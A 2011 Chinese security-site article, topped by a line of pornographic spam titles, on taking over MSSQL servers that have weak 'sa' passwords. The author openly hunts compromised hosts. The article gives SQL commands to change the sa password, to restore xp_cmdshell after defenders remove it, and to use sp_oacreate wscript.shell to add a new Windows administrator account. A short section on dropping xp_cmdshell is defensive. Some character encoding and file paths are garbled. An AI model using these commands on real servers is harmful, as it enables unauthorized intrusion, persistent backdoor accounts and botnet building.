国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

移動(dòng)安全 安全管理 應(yīng)用案例網(wǎng)絡(luò)威脅 系統(tǒng)安全 應(yīng)用安全 數(shù)據(jù)安全 云安全

黑客強(qiáng)行入侵sa弱口令

時(shí)間:2011-05-03 15:15來(lái)源: 點(diǎn)擊:
黑客強(qiáng)行入侵sa弱口令,其實(shí)還有其它辦法只要你掃到SA弱口令發(fā)現(xiàn)執(zhí)行不了DOS命令基本上是他的一個(gè)擴(kuò)展儲(chǔ)存給刪了,只要給他上傳一個(gè)到SYSTEM32下基本上可以解決。
Tags黑客攻擊(93)弱口令(8)  

  我自己現(xiàn)在找肉雞主要是找SA弱口令肉雞到還能找到幾只,但也碰到不少困難,到處查資料總算找到點(diǎn)有用的。

  下面這些命令要SQL分離器才能實(shí)現(xiàn),下面是一些關(guān)于sa弱口令相關(guān)命令。

  注:具體問(wèn)題具體分析,以上方法僅供參考,不一定有效,相關(guān)原理知識(shí)請(qǐng)自行查找。

  一.更改sa口令方法:

  用sql綜合利用工具連接后,執(zhí)行命令:

  exec sp_password NULL,'新密碼','sa'

  (提示:慎用!)

  二.簡(jiǎn)單修補(bǔ)sa弱口令:

  方法1:查詢分離器連接后執(zhí)行:

  if exists (select * from dbo.sysobjects where id =

  object_id(N'[dbo].[xp_cmdshell]') and

  OBJECTPROPERTY(id, N'IsExtendedProc') =

  1) exec sp_dropextendedproc N'[dbo].[xp_cmdshell]' GO

  然后按F5鍵命令執(zhí)行完畢。

  方法2:查詢分離器連接后

  第一步執(zhí)行:use master,

  第二步執(zhí)行:sp_dropextendedproc 'xp_cmdshell',

  然后按F5鍵命令執(zhí)行完畢。

  三.常見情況恢復(fù)執(zhí)行xp_cmdshell:

  1 未能找到過(guò)程'master..xpcmdshell'。

  恢復(fù)方法:查詢分離器連接后,

  第一步執(zhí)行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,

  第二步執(zhí)行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',

  然后按F5鍵命令執(zhí)行完畢。

  2 無(wú)法裝載 DLL xpsql70.dll 或該DLL所引用的某一DLL。原因126(找不到指定。)

  恢復(fù)方法:查詢分離器連接后,

  第一步執(zhí)行:sp_dropextendedproc "xp_cmdshell",

  第二步執(zhí)行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

  然后按F5鍵命令執(zhí)行完畢。

  3 無(wú)法在庫(kù) xpweb70.dll 中找到函數(shù) xp_cmdshell。原因: 127(找不到指定的程序。)

  恢復(fù)方法:查詢分離器連接后,

  第一步執(zhí)行:exec sp_dropextendedproc 'xp_cmdshell'

  第二步執(zhí)行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'

  然后按F5鍵命令執(zhí)行完畢。

  四.終極方法:

  如果以上方法均不可恢復(fù),請(qǐng)嘗試用下面的辦法直接添加帳戶:

  查詢分離器連接后,

  2000servser系統(tǒng):

  declare @shell int exec sp_oacreate 'wscript.shell',

  @shell outputexec sp_oamethod @shell,'run',null,'

  c:winntsystem32cmd.exe /c net user

  新用戶 密碼 /add'declare @shell int exec sp_oacreate

  'wscript.shell',@shell output exec sp_oamethod@shell,

  'run',null,'c:winntsystem32cmd.exe

  /c net localgroup administrators 新用戶 /add'

  xp或2003server系統(tǒng):

  declare @shell int exec sp_oacreate 'wscript.shell',

  @shell output exec sp_oamethod@shell,'run',null,

  'c:windowssystem32cmd.exe /c net user 新用戶 密碼

  /add'declare @shell int exec sp_oacreate 'wscript.shell',

  @shell output exec sp_oamethod@shell,'run',null,

  'c:windowssystem32cmd.exe /c net localgroup administrators

  新用戶 /add'

  其實(shí)還有其它辦法只要你掃到SA弱口令發(fā)現(xiàn)執(zhí)行不了DOS命令基本上是他的一個(gè)擴(kuò)展儲(chǔ)存給刪了,只要給他上傳一個(gè)到SYSTEM32下基本上可以解決。只是這個(gè)我還沒(méi)認(rèn)真研究。

------分隔線----------------------------

推薦內(nèi)容